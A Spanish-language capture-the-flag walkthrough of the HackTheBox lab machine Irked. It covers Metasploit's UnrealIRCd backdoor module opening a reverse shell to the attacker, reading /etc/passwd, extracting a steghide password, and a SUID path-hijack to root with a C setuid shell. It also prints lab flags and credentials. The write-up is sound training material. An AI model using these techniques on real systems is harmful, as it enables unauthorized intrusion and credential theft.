__    _____        _____     _____ _ _____
        |  |  |  _  |   ___|  _  |___|  |  |_|_   _|___
        |  |__|     |  |  _|     |_ -|     | | | | | .'| 
        |_____|__|__|  |___|__|__|___|__|__|_| |_| |__,|
			hola@lacashita.com

 
 

[HTB] Irked

Hoy vamos a hackear la maquina de HTB llamada Irked. Esta catalogada como facil.
  • Enumeration
  • Para empezar hacemos un nmap para ver que puertos tiene abiertos.
    sml@m0nikE:~/ctf/htb/machines/irked$ nmap -A -p- 10.10.10.117 Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-02 16:31 CET Nmap scan report for 10.10.10.117 Host is up (0.050s latency). Not shown: 65528 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0) | ssh-hostkey: | 1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA) | 2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA) | 256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA) |_ 256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519) 80/tcp open http Apache httpd 2.4.10 ((Debian)) |_http-server-header: Apache/2.4.10 (Debian) |_http-title: Site doesn't have a title (text/html). 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind | 100000 3,4 111/udp6 rpcbind | 100024 1 44359/tcp6 status | 100024 1 47760/udp status | 100024 1 49705/tcp status |_ 100024 1 50353/udp6 status 6697/tcp open irc UnrealIRCd 8067/tcp open irc UnrealIRCd 49705/tcp open status 1 (RPC #100024) 65534/tcp open irc UnrealIRCd Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 1378.78 seconds
    Vemos que tiene varios puertos abiertos, y tras revisarlos parece que hay un exploit para UnrealIRCd.
  • Exploitation
  • Configuramos Metasploit para usar la vulnerabilidad de UnrealIRCd.
    msf5 > search unreal Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/linux/games/ut2004_secure 2004-06-18 good Yes Unreal Tournament 2004 "secure" Overflow (Linux) 1 exploit/unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent No UnrealIRCD 3.2.8.1 Backdoor Command Execution 2 exploit/windows/games/ut2004_secure 2004-06-18 good Yes Unreal Tournament 2004 "secure" Overflow (Win32) msf5 > use exploit/unix/irc/unreal_ircd_3281_backdoor msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options Module options (exploit/unix/irc/unreal_ircd_3281_backdoor): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' RPORT 6667 yes The target port (TCP) Exploit target: Id Name -- ---- 0 Automatic Target msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rhosts 10.10.10.117 rhosts => 10.10.10.117 msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rport 6697 rport => 6697 msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit [*] Started reverse TCP double handler on 10.10.14.6:4444 [*] 10.10.10.117:6697 - Connected to 10.10.10.117:6697... :irked.htb NOTICE AUTH :*** Looking up your hostname... [*] 10.10.10.117:6697 - Sending backdoor command... [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo c7xNhr3Z1pldPJIL; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket A [*] A: "c7xNhr3Z1pldPJIL\r\n" [*] Matching... [*] B is input... [*] Command shell session 1 opened (10.10.14.6:4444 -> 10.10.10.117:43230) at 2019-11-02 16:43:51 +0100 python -c 'import pty; pty.spawn("/bin/sh")' $ cat /etc/passwd cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false messagebus:x:104:111::/var/run/dbus:/bin/false avahi:x:105:112:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false Debian-exim:x:106:114::/var/spool/exim4:/bin/false statd:x:107:65534::/var/lib/nfs:/bin/false colord:x:108:118:colord colour management daemon,,,:/var/lib/colord:/bin/false dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false geoclue:x:110:119::/var/lib/geoclue:/bin/false pulse:x:111:121:PulseAudio daemon,,,:/var/run/pulse:/bin/false speech-dispatcher:x:112:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh sshd:x:113:65534::/var/run/sshd:/usr/sbin/nologin rtkit:x:114:123:RealtimeKit,,,:/proc:/bin/false saned:x:115:124::/var/lib/saned:/bin/false usbmux:x:116:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false hplip:x:117:7:HPLIP system user,,,:/var/run/hplip:/bin/false Debian-gdm:x:118:125:Gnome Display Manager:/var/lib/gdm3:/bin/false djmardov:x:1000:1000:djmardov,,,:/home/djmardov:/bin/bash ircd:x:1001:1001::/home/ircd:/bin/sh
    Vemos que existe un usuario llamado djmardov, asi que vamos a ver que ficheros tiene.
    $ find / -user djmardov 2>/dev/null find / -user djmardov 2>/dev/null /home/djmardov /home/djmardov/.dbus /home/djmardov/.profile /home/djmardov/.ssh /home/djmardov/Downloads /home/djmardov/Documents /home/djmardov/Documents/user.txt /home/djmardov/Documents/.backup /home/djmardov/.gnupg /home/djmardov/Desktop /home/djmardov/.cache /home/djmardov/.gconf /home/djmardov/.local /home/djmardov/.ICEauthority /home/djmardov/Music /home/djmardov/Public /home/djmardov/.config /home/djmardov/.bash_logout /home/djmardov/.bashrc /home/djmardov/Videos /home/djmardov/Pictures /home/djmardov/Templates /home/djmardov/.mozilla
    Llama la atencion el fichero llamado /home/djmardov/Documents/.backup asi que vamos a ver que contiene.
    $ file /home/djmardov/Documents/.backup /home/djmardov/Documents/.backup: ASCII text $ cat /home/djmardov/Documents/.backup Super elite steg backup pw UPupDOWNdownLRlrBAbaSSss
    Parece que el fichero contiene una password.. y dice "steg" con lo cual podemos suponer que hay algun fichero con algo "oculto". Despues de revisar, nos descargamos en nuestro pc la imagen que aparece en la web:
    wget http://10.10.10.117/irked.jpg
    Vamos a ver si con steghide y el password que contiene .backup podemos encontrar algo en la imagen que hemos descargado...
    sml@m0nikE:~/ctf/htb/machines/irked$ steghide extract -sf irked.jpg Anotar salvoconducto: anot� los datos extra�dos e/"pass.txt". sml@m0nikE:~/ctf/htb/machines/irked$ cat pass.txt Kab6h+m+bbp2J:HG
    Parece que contiene la password de djmardov, asi que probamos a conectarnos por ssh con esos credenciales.
    sml@m0nikE:~/ctf/htb/machines/irked$ssh djmardov@10.10.10.117
  • user.txt
  • Las credenciales han funcionado, asi que miramos la flag del usuario.
    djmardov@irked:~$ ls Desktop Documents Downloads Music Pictures Public Templates Videos djmardov@irked:~$ cd Documents/ djmardov@irked:~/Documents$ ls user.txt djmardov@irked:~/Documents$ cat user.txt 4a66a78b12dc0e661a59d3f5c0267a8e djmardov@irked:~/Documents$
  • Privilege Escalation
  • Nos descargamos en la maquina el script linuxprivchecker.py y vamos a ver si encontramos algo de informacion util...
    djmardov@irked:/tmp$ python linuxprivchecker.py ================================================================================ ================= LINUX PRIVILEGE ESCALATION CHECKER ================================================================================ ================= [*] GETTING BASIC SYSTEM INFO... [+] Kernel Linux version 3.16.0-6-686-pae (debian-kernel@lists.debian.org) (gcc version 4.9.2 (Debian 4.9.2-10+deb8u1) ) #1 SMP Debian 3.16.56-1+deb8u1 (2018-05-08) [+] Hostname irked [+] Operating System Debian GNU/Linux 8 \n \l [*] ENUMERATING USER AND ENVIRONMENTAL INFO... [+] Logged in User Activity 11:02:36 up 1 min, 2 users, load average: 0.19, 0.12, 0.04 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT djmardov pts/0 10.10.14.14 11:02 1.00s 0.07s 0.00s /bin/sh -c w 2>/dev/null [+] Super Users Found: root [+] All users root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false messagebus:x:104:111::/var/run/dbus:/bin/false avahi:x:105:112:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false Debian-exim:x:106:114::/var/spool/exim4:/bin/false statd:x:107:65534::/var/lib/nfs:/bin/false colord:x:108:118:colord colour management daemon,,,:/var/lib/colord:/bin/false dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false geoclue:x:110:119::/var/lib/geoclue:/bin/false pulse:x:111:121:PulseAudio daemon,,,:/var/run/pulse:/bin/false speech-dispatcher:x:112:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh sshd:x:113:65534::/var/run/sshd:/usr/sbin/nologin rtkit:x:114:123:RealtimeKit,,,:/proc:/bin/false saned:x:115:124::/var/lib/saned:/bin/false usbmux:x:116:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false hplip:x:117:7:HPLIP system user,,,:/var/run/hplip:/bin/false Debian-gdm:x:118:125:Gnome Display Manager:/var/lib/gdm3:/bin/false djmardov:x:1000:1000:djmardov,,,:/home/djmardov:/bin/bash ircd:x:1001:1001::/home/ircd:/bin/sh [+] Current User djmardov [+] Current User ID uid=1000(djmardov) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugde v),108(netdev),110(lpadmin),113(scanner),117(bluetooth) [*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS... [+] World Writeable Directories for User/Group 'Root' drwxrwxrwt 8 root root 4096 Jan 6 11:01 /var/tmp drwxrwxrwt 11 root root 4096 Jan 6 11:02 /tmp drwxrwxrwt 2 root root 4096 Jan 6 11:00 /tmp/.XIM-unix drwxrwxrwt 2 root root 4096 Jan 6 11:01 /tmp/.ICE-unix drwxrwxrwt 2 root root 4096 Jan 6 11:01 /tmp/.X11-unix drwxrwxrwt 2 root root 4096 Jan 6 11:00 /tmp/.Test-unix drwxrwxrwt 2 root root 4096 Jan 6 11:00 /tmp/.font-unix drwxrwxrwt 5 root root 120 Jan 6 11:01 /run/lock drwxrwxrwt 2 root root 40 Jan 6 11:00 /dev/mqueue drwxrwxrwt 2 root root 120 Jan 6 11:01 /dev/shm [+] World Writeable Directories for Users other than Root [+] World Writable Files [+] Checking if root's home folder is accessible [+] SUID/SGID Files and Directories -rwxr-sr-x 1 root mail 13680 Dec 24 2016 /usr/lib/evolution/camel-lock-helper-1.2 -rwxr-sr-x 1 root utmp 13992 Jun 23 2014 /usr/lib/libvte-2.90-9/gnome-pty-helper -rwxr-sr-x 1 root utmp 13992 Dec 5 2014 /usr/lib/libvte-2.91-0/gnome-pty-helper -rwxr-sr-x 1 root utmp 4972 Feb 21 2011 /usr/lib/utempter/utempter -rwsr-xr-- 1 root messagebus 362672 Nov 21 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper -rwsr-xr-x 1 root root 9468 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device -rwsr-xr-x 1 root root 13816 Sep 8 2016 /usr/lib/policykit-1/polkit-agent-helper-1 -rwsr-xr-x 1 root root 562536 Nov 19 2017 /usr/lib/openssh/ssh-keysign -rwsr-xr-x 1 root root 13564 Oct 14 2014 /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper drwxrwsr-t 2 root lpadmin 4096 Jul 23 2017 /usr/share/ppd/custom -rwsr-xr-x 1 root root 1085300 Feb 10 2018 /usr/sbin/exim4 -rwsr-xr-- 1 root dip 338948 Apr 14 2015 /usr/sbin/pppd -rwxr-sr-x 1 root tty 26240 Mar 29 2015 /usr/bin/wall -rwxr-sr-x 1 root mail 17880 Nov 18 2017 /usr/bin/lockfile -rwsr-xr-x 1 root root 43576 May 17 2017 /usr/bin/chsh -rwsr-sr-x 1 root mail 96192 Nov 18 2017 /usr/bin/procmail -rwsr-xr-x 1 root root 78072 May 17 2017 /usr/bin/gpasswd -rwsr-xr-x 1 root root 38740 May 17 2017 /usr/bin/newgrp -rwsr-sr-x 1 daemon daemon 50644 Sep 30 2014 /usr/bin/at -rwxr-sr-x 1 root shadow 21964 May 17 2017 /usr/bin/expiry -rwxr-sr-x 1 root tty 9680 Oct 17 2014 /usr/bin/bsd-write -rwxr-sr-x 1 root mail 9772 Dec 4 2014 /usr/bin/mutt_dotlock -rwxr-sr-x 1 root ssh 419192 Nov 19 2017 /usr/bin/ssh-agent -rwsr-xr-x 1 root root 18072 Sep 8 2016 /usr/bin/pkexec -rwxr-sr-x 1 root mail 13892 Jun 2 2013 /usr/bin/dotlockfile -rwxr-sr-x 1 root crontab 38844 Jun 7 2015 /usr/bin/crontab -rwsr-sr-x 1 root root 9468 Apr 1 2014 /usr/bin/X -rwsr-xr-x 1 root root 53112 May 17 2017 /usr/bin/passwd -rwxr-sr-x 1 root mlocate 32116 Jun 13 2013 /usr/bin/mlocate -rwsr-xr-x 1 root root 52344 May 17 2017 /usr/bin/chfn -rwxr-sr-x 1 root shadow 61232 May 17 2017 /usr/bin/chage -rwsr-xr-x 1 root root 7328 May 16 2018 /usr/bin/viewuser drwxrwsr-x 10 root staff 4096 May 11 2018 /usr/local drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/include drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/etc drwxrwsr-x 4 root staff 4096 May 11 2018 /usr/local/lib drwxrwsr-x 4 root staff 4096 May 11 2018 /usr/local/lib/python2.7 drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/lib/python2.7/site-packages drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/lib/python2.7/dist-packages drwxrwsr-x 3 root staff 4096 May 11 2018 /usr/local/lib/python3.4 drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/lib/python3.4/dist-packages drwxrwsr-x 8 root staff 4096 May 11 2018 /usr/local/share drwxrwsr-x 6 root staff 4096 May 11 2018 /usr/local/share/xml drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/share/xml/declaration drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/share/xml/entities drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/share/xml/schema drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/share/xml/misc drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/share/man drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/share/ca-certificates drwxrwsr-x 3 root staff 4096 May 11 2018 /usr/local/share/emacs drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/share/emacs/site-lisp drwxrwsr-x 7 root staff 4096 May 11 2018 /usr/local/share/sgml drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/share/sgml/declaration drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/share/sgml/entities drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/share/sgml/stylesheet drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/share/sgml/misc drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/share/sgml/dtd drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/share/fonts drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/sbin drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/bin drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/games drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/src drwxr-s--- 2 root dip 4096 May 11 2018 /etc/chatscripts drwxr-s--- 2 root dip 4096 May 11 2018 /etc/ppp/peers drwxr-sr-x 29 man root 4096 Nov 3 2018 /var/cache/man drwxr-sr-x 2 man root 4096 Nov 3 2018 /var/cache/man/hu drwxr-sr-x 2 man root 4096 Nov 3 2018 /var/cache/man/ko drwxr-sr-x 2 man root 4096 Nov 3 2018 /var/cache/man/pl drwxr-sr-x 2 man root 4096 Nov 3 2018 /var/cache/man/fr drwxr-sr-x 2 man root 4096 Nov 3 2018 /var/cache/man/de drwxr-sr-x 2 man root 4096 Nov 3 2018 /var/cache/man/gl drwxr-sr-x 2 man root 4096 Nov 3 2018 /var/cache/man/ro drwxr-sr-x 2 man root 4096 Nov 3 2018 /var/cache/man/sk drwxr-sr-x 2 man root 4096 Nov 3 2018 /var/cache/man/fi drwxr-sr-x 2 man root 4096 Nov 3 2018 /var/cache/man/id drwxr-sr-x 2 man root 4096 Nov 3 2018 /var/cache/man/sl drwxr-sr-x 2 man root 4096 Nov 3 2018 /var/cache/man/zh_CN drwxr-sr-x 2 man root 4096 Nov 3 2018 /var/cache/man/cs drwxr-sr-x 2 man root 4096 Nov 3 2018 /var/cache/man/ja drwxr-sr-x 2 man root 4096 Nov 3 2018 /var/cache/man/tr drwxr-sr-x 2 man root 4096 Nov 3 2018 /var/cache/man/pt_BR drwxr-sr-x 2 man root 4096 Nov 3 2018 /var/cache/man/hr drwxr-sr-x 2 man root 4096 Nov 3 2018 /var/cache/man/es drwxr-sr-x 2 man root 4096 Nov 3 2018 /var/cache/man/sv drwxr-sr-x 2 man root 4096 Nov 3 2018 /var/cache/man/it drwxr-sr-x 2 man root 4096 Nov 3 2018 /var/cache/man/zh drwxr-sr-x 2 man root 4096 Nov 3 2018 /var/cache/man/nl drwxr-sr-x 2 man root 4096 Nov 3 2018 /var/cache/man/pt drwxr-sr-x 2 man root 4096 Nov 3 2018 /var/cache/man/ru drwxr-sr-x 2 man root 4096 Nov 3 2018 /var/cache/man/zh_TW drwxr-sr-x 2 man root 4096 Nov 3 2018 /var/cache/man/el drwxr-sr-x 2 man root 4096 Nov 3 2018 /var/cache/man/da drwxrwsr-x 2 root mail 4096 May 11 2018 /var/mail drwxr-s--- 2 Debian-exim adm 4096 Nov 3 2018 /var/log/exim4 drwxrwsr-x 2 root staff 4096 Jan 9 2017 /var/local -rwsr-xr-x 1 root root 96760 Aug 13 2014 /sbin/mount.nfs -rwxr-sr-x 1 root shadow 34424 May 27 2017 /sbin/unix_chkpwd -rwsr-xr-x 1 root root 38868 May 17 2017 /bin/su -rwsr-xr-x 1 root root 34684 Mar 29 2015 /bin/mount -rwsr-xr-x 1 root root 34208 Jan 21 2016 /bin/fusermount -rwsr-xr-x 1 root root 161584 Jan 28 2017 /bin/ntfs-3g -rwsr-xr-x 1 root root 26344 Mar 29 2015 /bin/umount drwxr-sr-x 3 root systemd-journal 60 Jan 6 11:00 /run/log/journal drwxr-s--- 2 root systemd-journal 60 Jan 6 11:00 /run/log/journal/58827ab6b7d24c318344087f9268b9b5 [*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING... [+] Installed Tools /usr/bin/awk /usr/bin/perl /usr/bin/python /usr/bin/gcc /usr/bin/cc /usr/bin/vi /usr/bin/nmap /usr/bin/find /bin/netcat /bin/nc /usr/bin/wget /usr/bin/ftp [+] Related Shell Escape Sequences... nmap--> --interactive vi--> :!bash vi--> :set shell=/bin/bash:shell awk--> awk 'BEGIN {system("/bin/bash")}' find--> find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \; perl--> perl -e 'exec "/bin/bash";' [*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS... Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested! The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system - Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit || http://www.exploit-db.com/exploits/5720 || Language=python The following exploits are applicable to this kernel version and should be investigated as well - Kernel ia32syscall Emulation Privilege Escalation || http://www.exploit-db.com/exploits/15023 || Language=c - Sendpage Local Privilege Escalation || http://www.exploit-db.com/exploits/19933 || Language=ruby** - CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) || http://www.exploit-db.com/exploits/15944 || Language=c - CAP_SYS_ADMIN to root Exploit || http://www.exploit-db.com/exploits/15916 || Language=c - MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c - open-time Capability file_ns_capable() Privilege Escalation || http://www.exploit-db.com/exploits/25450 || Language=c - open-time Capability file_ns_capable() - Privilege Escalation Vulnerability || http://www.exploit-db.com/exploits/25307 || Language=c Finished ================================================================================ =================
    Mirando en los archivos SUID/SGID podemos ver que hay un fichero inusual. Al ejecutarlo nos indica que no encuentra "/tmp/listusers"
    djmardov@irked:~$ /usr/bin/viewuser This application is being devleoped to set and test user permissions It is still being actively developed (unknown) :0 2020-01-06 11:03 (:0) djmardov pts/0 2020-01-06 11:09 (10.10.14.14) sh: 1: /tmp/listusers: not found
    Creamos el fichero "tmp/listusers" y volvemos a ejecutarlo a ver que pasa...
    djmardov@irked:~$ touch /tmp/listusers djmardov@irked:~$ /usr/bin/viewuser This application is being devleoped to set and test user permissions It is still being actively developed (unknown) :0 2020-01-06 11:03 (:0) djmardov pts/0 2020-01-06 11:09 (10.10.14.14) sh: 1: /tmp/listusers: Permission denied
    Ahora pone permiso denegado... Probamos a poner el comando "id" dentro del fichero y darle permisos de ejecucion...
    djmardov@irked:~$ echo id > /tmp/listusers djmardov@irked:~$ chmod +x /tmp/listusers djmardov@irked:~$ /usr/bin/viewuser This application is being devleoped to set and test user permissions It is still being actively developed (unknown) :0 2020-01-06 11:03 (:0) djmardov pts/0 2020-01-06 11:09 (10.10.14.14) uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugde v),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
    Vemos que lo ha ejecutado... y con id de root. Sabiendo esto vamos a preparar una shell que nos de privilegios de root. Copiamos el siguiente codigo en un archivo llamado /tmp/listusers.c
    #include <stdio.h> #include <sys/types.h> #include <unistd.h> int main(void) { setuid(0); setgid(0); system("/bin/bash"); }
    Ahora compilamos y ejecutamos...
    djmardov@irked:~$ gcc -o /tmp/listusers /tmp/listusers.c djmardov@irked:~$ chmod +x /tmp/listusers djmardov@irked:~$ /usr/bin/viewuser This application is being devleoped to set and test user permissions It is still being actively developed (unknown) :0 2020-01-19 15:43 (:0) djmardov pts/0 2020-01-19 15:46 (10.10.14.25) root@irked:~# id uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108( netdev),110(lpadmin),113(scanner),117(bluetooth),1000(djmardov)
    Ya somos root :)
  • root.txt
  • root@irked:/root# cat root.txt 8d8e9e8be64654b6dccc3bff4522daf3
  • End
  • Y con esto ya tendriamos el flag del "user" y el flag de "root".